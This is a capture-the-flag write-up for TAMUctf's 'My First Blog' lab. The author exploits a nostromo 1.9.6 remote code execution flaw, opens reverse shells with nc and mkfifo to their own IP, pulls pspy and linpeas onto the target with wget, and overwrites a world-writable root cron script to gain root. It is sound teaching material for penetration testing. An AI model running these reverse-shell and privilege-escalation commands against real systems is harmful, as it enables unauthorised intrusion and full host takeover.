TAMUctf NETWORK_PENTEST MY_FIRST_BLOG

MY_FIRST_BLOG

Here is a link to my new blog! I read about a bunch of exploits in common server side blog tools so I just decided to make my website static. Hopefully that should keep it secure.

Root owns the flag.

http://172.30.0.2/

my-first-blog.ovpn

Given the my-first-blog.ovpn file.

I connect to the server.

$ sudo openvpn my-first-blog.ovpn

I saw the blog.

f:id:Yunolay:20200322195201p:plain

I checked the port with nmap.

$ nmap -sC -sV 172.30.0.2
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-22 06:53 EDT
Nmap scan report for 172.30.0.2
Host is up (0.13s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    nostromo 1.9.6
|_http-generator: Hugo 0.54.0
|_http-server-header: nostromo 1.9.6
|_http-title: My first blog!

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 119.48 seconds

Server uses nostromo 1.9.6.

The following RCE can be used:

nostromo 1.9.6 - Remote Code Execution - Multiple remote Exploit

My ip is 172.30.0.14.

I listened on 4444 port and ran a reverse shell on server.

$ nc -lnvp 4444
$ python cve2019_16278.py 172.30.0.2 80 "mkfifo /tmp/mwodv; nc 172.30.0.14 4444 0</tmp/mwodv | /bin/sh >/tmp/mwodv 2>&1; rm /tmp/mwodv"

                                        _____-2019-16278
        _____  _______    ______   _____\    \   
   _____\    \_\      |  |      | /    / |    |  
  /     /|     ||     /  /     /|/    /  /___/|  
 /     / /____/||\    \  \    |/|    |__ |___|/  
|     | |____|/ \ \    \ |    | |       \        
|     |  _____   \|     \|    | |     __/ __     
|\     \|\    \   |\         /| |\    \  /  \    
| \_____\|    |   | \_______/ | | \____\/    |   
| |     /____/|    \ |     | /  | |    |____/|   
 \|_____|    ||     \|_____|/    \|____|   | |   
        |____|/                        |___|/    

I got webserver's shell.

$ nc -lnvp 4444
listening on [any] 4444 ...
connect to [172.30.0.14] from (UNKNOWN) [172.30.0.2] 50206
whoami
webserver

We can use wget.

wget 
wget: missing URL
Usage: wget [OPTION]... [URL]...

Try `wget --help' for more options.

I uploaded pspy64s and linpeas to server's tmp directory.

GitHub - carlospolop/privilege-escalation-awesome-scripts-suite: PEASS - Privilege Escalation Awesome Scripts SUITE (with colors)

GitHub - DominicBreuker/pspy: Monitor linux processes without root permissions

$ python3 -m http.server
cd /tmp
wget http://172.30.0.14:8000/pspy64s
wget http://172.30.0.14:8000/linpeas.sh
ls
linpeas.sh
nostromo-1.9.6
oncufxq
pspy64s
shell.elf
start.sh
chmod +x pspy64s
chmod +x linpeas.sh

I ran pspy64s.

2020/03/22 11:21:02 CMD: UID=1000 PID=12542  | /bin/sh 
2020/03/22 11:21:02 CMD: UID=1000 PID=12525  | sed s,:.*,&, 
2020/03/22 11:21:02 CMD: UID=1000 PID=12524  | head -n 70 
2020/03/22 11:21:02 CMD: UID=1000 PID=12523  | awk -F: {if (pre != $1){ print $0; }; pre=$1}                                                                              
2020/03/22 11:21:02 CMD: UID=1000 PID=12522  | grep -Ev 0{20,} 
2020/03/22 11:21:02 CMD: UID=1000 PID=12521  | grep -v \.tif$\|\.tiff$\|\.gif$\|\.jpeg$\|\.jpg\|\.jif$\|\.jfif$\|\.jp2$\|\.jpx$\|\.j2k$\|\.j2c$\|\.fpx$\|\.pcd$\|\.png$\|\.pdf$\|\.flv$\|\.mp4$\|\.mp3$\|\.gifv$\|\.avi$\|\.mov$\|\.mpeg$\|\.wav$\|\.doc$\|\.docx$\|\.xls$\|\.xlsx$                                                                 
2020/03/22 11:21:02 CMD: UID=1000 PID=12520  | grep -v /.git/\|/sources/authors/ 
2020/03/22 11:21:02 CMD: UID=1000 PID=12519  | grep -RIEHo \$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*|[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}|\$H\$[a-zA-Z0-9_/\.]{31}|\$P\$[a-zA-Z0-9_/\.]{31}|\$S\$[a-zA-Z0-9_/\.]{52}|\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}|\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}|\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}|\{SHA\}[0-9a-zA-Z/_=]{10,} /etc /var/backups /tmp /var/tmp /var/www /root /home /mnt                                                                             
2020/03/22 11:21:02 CMD: UID=0    PID=11     | sleep 1000000 
2020/03/22 11:21:02 CMD: UID=1000 PID=10     | nhttpd 
2020/03/22 11:21:02 CMD: UID=0    PID=1      | bash /tmp/start.sh 
2020/03/22 11:22:01 CMD: UID=0    PID=13302  | CRON 
2020/03/22 11:22:01 CMD: UID=0    PID=13303  | /bin/sh -c /usr/bin/healthcheck 
2020/03/22 11:22:01 CMD: UID=0    PID=13304  | /bin/bash /usr/bin/healthcheck 

uid=0(root) ran /usr/bin/healthcheck.

Then server ran nc -z localhost 80.

Next, I ran linpeas.sh.

linpeas provides us various informations.

The important thing is the file to which you have write permission.

(snip)

[+] Interesting writable Files
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files       
/dev/mqueue                                                                          
/dev/mqueue/linpeas.txt
/dev/shm
/run/lock
/sys/firmware
/tmp
/tmp/linpeas.sh
/tmp/pspy64s
/tmp/shell.elf
93m/usr/bin/healthcheck
/var/nostromo/conf
/var/nostromo/conf/mimes
/var/nostromo/conf/nhttpd.conf
/var/nostromo/conf/nhttpd.conf-dist
/var/nostromo/htdocs
/var/nostromo/htdocs/cgi-bin
/var/nostromo/htdocs/cgi-bin/printenv
/var/nostromo/icons
/var/nostromo/logs
/var/nostromo/logs/access_log
/var/nostromo/logs/nhttpd.pid
/var/tmp

(snip)

/usr/bin/healthcheck has write permission.

If we rewrite healthcheck and let cron run, we can get the root shell.

#!/bin/bash
mkfifo /tmp/mwodv; nc 172.30.0.14 4446 0</tmp/mwodv | /bin/sh >/tmp/mwodv 2>&1; rm /t

I upload meterpreter payload and I used meterpreter upload module.

meterpreter > upload healthcheck
[*] uploading  : healthcheck -> healthcheck
[*] Uploaded -1.00 B of 97.00 B (-1.03%): healthcheck -> healthcheck
[*] uploaded   : healthcheck -> healthcheck

I listened on 4446 port and I got root shell.

$ nc -lnvp 4446
listening on [any] 4446 ...
connect to [172.30.0.14] from (UNKNOWN) [172.30.0.2] 59984
whoami
root

So I got flag.

cd 
ls
flag.txt
cat flag.txt
gigem{l1m17_y0ur_p3rm15510n5}
FLAG : gigem{l1m17_y0ur_p3rm15510n5}

thank you for reading.